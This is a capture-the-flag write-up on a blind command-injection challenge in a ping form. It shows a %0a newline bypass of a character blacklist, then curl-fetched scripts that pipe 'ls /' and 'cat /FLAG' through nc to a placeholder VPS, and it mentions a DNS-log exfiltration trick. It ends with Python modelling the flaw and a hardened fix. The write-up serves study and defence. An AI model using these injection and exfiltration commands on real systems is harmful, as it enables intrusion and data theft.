lca

True unfreedom is building a cage inside your own heart.

Command Execution Bypass - Death Ping Command

[screenshot]

A friend sent me a CTF challenge. Opening the website shows a command execution vulnerability at first glance.

[screenshot]

Capturing the request and testing shows that no command output is echoed back (the injection is blind), but the response indicates that the command ran successfully.

[screenshot]

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 12
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1

Testing which characters are filtered showed that the following are rejected, which rules out the usual DNS log bypass:

; ` $

[screenshot]

[screenshot]

The DNS log bypass usually relies on backticks (or $(...)) for command substitution, so that the command output becomes a subdomain of the attacker's DNS log host, for example

`whoami`.xxx.dnslog.cn

With both the backtick and $ filtered, neither form of substitution is available.

Testing revealed that the newline character is not filtered. Because the body is application/x-www-form-urlencoded, the server decodes %0a into a literal line feed before the value reaches the shell, and the shell treats a line feed as a command separator just like ;. So a payload of the form 127.0.0.1%0a<command> runs the attacker's command after the ping.

  1. Prepare a VPS and create a script named 1.sh on it with the following content:
ls / | nc vps_address 1234
  2. On the VPS, listen with nc, and in a second window start a Python HTTP server so the target can download 1.sh:
nc -lvnp 1234
python3 -m http.server 80
  3. Make the target run the following commands, each sent as its own request with the command appended after ip=127.0.0.1%0a (the > redirect is not filtered, so writing the file works; the chmod is not strictly needed, since /bin/sh reads the script rather than executing it directly):
ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh
chmod 777 /tmp/4.sh
/bin/sh /tmp/4.sh

The request shows as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 50
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh

[screenshot]

The result is as follows: the nc listener on the VPS receives the output of ls /, confirming that the injected commands ran on the target.

[screenshot]

To view the flag, simply modify the content of the 1.sh script as follows:

cat /FLAG | nc vps_address 1234

Run through it again to obtain the flag:

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/5.sh
chmod 777 /tmp/5.sh
/bin/sh /tmp/5.sh

[screenshot]
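To make the mechanism behind the %0a bypass concrete, here is an added example (not code from the original post or from the challenge) that models the filter in Python: a blacklist of `;`, backtick and `$` applied to the URL-decoded value, followed by string concatenation into a shell command, which is the assumed shape of ping.php. `echo` stands in for the real `ping` so it runs offline, and `vps_address` is the placeholder from the write-up. It also shows the hardened form (allow-list the value as an IP literal and call argv without a shell) and a helper that builds the same request bodies the write-up sends.

```python
import ipaddress
import subprocess
import urllib.parse

# Characters the write-up found blacklisted on the challenge's ping.php.
BLACKLIST = set(";`$")


def decode_form_value(raw):
    """URL-decode a form-encoded value the way the server would (%0a -> '\\n')."""
    return urllib.parse.unquote_plus(raw)


def is_blocked(value):
    """Model of the challenge's filter: reject if any blacklisted char is present."""
    return any(c in BLACKLIST for c in value)


def vulnerable_ping(raw_ip):
    """Stand-in for the vulnerable ping.php (assumed shape: blacklist check, then
    string concatenation into a shell command). 'echo' replaces the real ping so
    this runs offline. Returns None when the filter rejects the input."""
    value = decode_form_value(raw_ip)
    if is_blocked(value):
        return None
    cmd = "echo ping -c 1 " + value  # the concatenation that makes this injectable
    # sh -c splits on newlines too, so "127.0.0.1\n<command>" runs two commands.
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def hardened_ping(raw_ip):
    """Fix: allow-list the value as an IP literal and pass argv without a shell.
    A value containing a newline (or anything else) is not a valid address."""
    value = decode_form_value(raw_ip)
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return None
    argv = ["echo", "ping", "-c", "1", str(addr)]  # no shell, so no separators
    return subprocess.run(argv, capture_output=True, text=True).stdout


def injection_body(command, ip="127.0.0.1"):
    """Build the form body the write-up sends: a benign IP, a newline, then the
    injected command. quote() encodes the newline as %0A (case is irrelevant to
    the decoder) and spaces and '>' as %20 and %3E."""
    return "ip=" + urllib.parse.quote(ip + "\n" + command, safe="/")


if __name__ == "__main__":
    print(repr(vulnerable_ping("127.0.0.1;id")))               # None: ';' is blacklisted
    print(repr(vulnerable_ping("127.0.0.1%0aecho injected")))  # both commands run
    print(repr(hardened_ping("127.0.0.1%0aecho injected")))    # None: not an IP literal
    print(injection_body("curl vps_address/1.sh > /tmp/4.sh"))
```

The blacklist is defeated because it enumerates separators it knows about while the shell also honours the line feed; the hardened version needs no blacklist at all, since an allow-list of valid addresses plus an argv call leaves no path to the shell. The trade-off is that hostnames are rejected too; if they must be accepted, validate them against a strict hostname pattern and still avoid `sh -c`.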

The format of the flag shows that the challenge comes from n1book.
